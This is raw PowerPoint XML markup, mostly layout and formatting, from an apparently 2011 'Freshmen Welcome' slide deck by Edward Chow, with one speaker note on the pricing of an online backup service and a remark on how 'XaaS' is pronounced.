                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{20E64338-5B25-4603-95A7-C15349778891}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" i="0"/>
              <a:pPr algn="r"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" i="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Carbonie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $59/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>yr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> home (All user-generated files on internal hard drive, after 200GB backup speed will be slow!!, $229/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>yr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> small business (all computers; $250 GB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>XaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> pronounced as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>zaas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3569256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0000"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 19" descr="ribbons"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="-33338" y="2039938"/>
            <a:ext cx="9177338" cy="2795587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635000" y="3049588"/>
            <a:ext cx="6696075" cy="585787"/>
          </a:xfrm>
          <a:ln algn="ctr"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635000" y="4387850"/>
            <a:ext cx="6642100" cy="420688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D291706A-4D04-45E8-AAE1-68E18DC48C8F}" type="slidenum">
              <a:rPr lang="en-US"/>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200025"/>
            <a:ext cx="2101850" cy="284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00025"/>
            <a:ext cx="6156325" cy="284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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{66F75CC0-CC52-4131-A982-6E7DD1FCF824}" type="slidenum">
              <a:rPr lang="en-US"/>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00025"/>
            <a:ext cx="8382000" cy="7508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103313"/>
            <a:ext cx="8410575" cy="1941512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7B955A53-BBC2-485C-B98D-EBC94910F4A4}" type="slidenum">
              <a:rPr lang="en-US"/>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00025"/>
            <a:ext cx="8382000" cy="7508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103313"/>
            <a:ext cx="4129088" cy="1941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2488" y="1103313"/>
            <a:ext cx="4129087" cy="1941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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{41A58B69-A1BA-435D-82B7-FEF291515FBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</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smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{51289606-D701-416F-AE77-1BE5BE8E1514}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163766459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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{31FAE079-BD98-4BB0-A2C2-078A011284E3}" type="slidenum">
              <a:rPr lang="en-US"/>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03313"/>
            <a:ext cx="4129088" cy="1941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2488" y="1103313"/>
            <a:ext cx="4129087" cy="1941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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0CE9E101-E78C-4CBA-81A9-05047ED8A906}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E071D9DD-99DB-48F0-B2EE-36E0A4B77BFA}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BFDE0793-3E8D-4549-B5DB-0E30B928D823}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{332C420C-5541-49B8-9184-0EF535A1787D}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0B3DA43D-B8A3-4619-A78F-63701B31C377}" type="slidenum">
              <a:rPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5230EB6A-4163-48B1-B592-519A4117B733}" type="slidenum">
              <a:rPr lang="en-US"/>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200025"/>
            <a:ext cx="8382000" cy="543739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="74001"/>
              </a:schemeClr>
            </a:outerShdw>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81000" y="1103313"/>
            <a:ext cx="8410575" cy="1941512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Object 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7845425" y="0"/>
          <a:ext cx="1298575" cy="1260475"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1092" name="Photo Editor Photo" r:id="rId18" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId18" imgW="1647619" imgH="1600000" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object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45425" y="0"/>
                        <a:ext cx="1298575" cy="1260475"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:extLst>
                        <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                          <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                            <a:solidFill>
                              <a:srgbClr val="F7E993"/>
                            </a:solidFill>
                          </a14:hiddenFill>
                        </a:ext>
                        <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                          <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                            <a:solidFill>
                              <a:srgbClr val="FFFFFF"/>
                            </a:solidFill>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a14:hiddenLine>
                        </a:ext>
                      </a:extLst>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Rectangle 1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defRPr sz="1400" b="1" i="1" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Rectangle 1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defRPr sz="1400" b="1" i="1" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
